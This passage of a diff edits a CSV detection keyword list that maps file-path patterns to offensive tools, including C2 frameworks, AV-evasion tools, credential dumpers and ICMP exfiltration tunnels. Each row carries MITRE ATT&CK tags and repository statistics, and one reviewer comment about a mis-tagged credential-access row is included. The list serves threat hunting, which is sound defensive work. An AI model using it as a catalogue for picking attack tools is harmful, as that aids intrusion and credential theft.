tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","0","N/A","N/A","10","929","190","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z" -"*/utils/obfuscate.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/utils/obfuscate.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/UTWOqVQ132/*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/UUID_bypass.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/vainject.c*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/vajra/phishApp.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" "*/var/lib/ptunnel*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" "*/var/log/exegol/*.log*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/veeam_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/Vegile.git*","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" "*/venom.git*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*/venom.sh *","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" 
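Review bot: The added `*/veeam_dump.py*` row is categorised as "Credential Access", but its tactics column (`TA0007 - TA0003 - TA0002 - TA0001`) omits TA0006 and its techniques column (`T1069 - T1021 - T1136 - T1018`) lists no credential-access technique. Anyone filtering or routing alerts by tactic will therefore not see this keyword as credential theft. Judging by the file name, the module dumps credentials stored by Veeam (inferred, since the row does not say so), so I would set the techniques to `T1555 - T1069 - T1021 - T1136 - T1018` and the tactics to `TA0006 - TA0007 - TA0003 - TA0002 - TA0001`. The description is the generic NetExec sentence; one line saying what this module targets would help an analyst triage a hit.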
@@ -5721,32 +5784,32 @@ "*/VirusTotalC2/*","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","5","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z" "*/VisualBasicObfuscator*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*/vmauthd-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/vmware_enum_*.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/vmware_enum_*.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/VMware-CVE-2022-22954*","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/sherlocksecurity/VMware-CVE-2022-22954","1","1","N/A","N/A","3","285","53","2022-04-13T06:15:11Z","2022-04-11T13:59:23Z" "*/vmware-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vnc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/vncdll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/vncdll/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/vncEncoder.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/VNCHooks*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/VNCHooks.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/vncdll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/vncdll/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/vncEncoder.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/VNCHooks*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/VNCHooks.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/vnc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vnc-title.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vnik_v1.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/voldemort-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/vpc__enum_lateral_movement*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/vss-enum.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/vssenum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*/vpc__enum_lateral_movement*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/vss-enum.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/vssenum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" "*/vtam-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vulners.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/vulnscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*/vulnserver.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*/vulnscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/vulnserver.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*/vulscan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "*/vuze-dht-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/waf__enum/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" 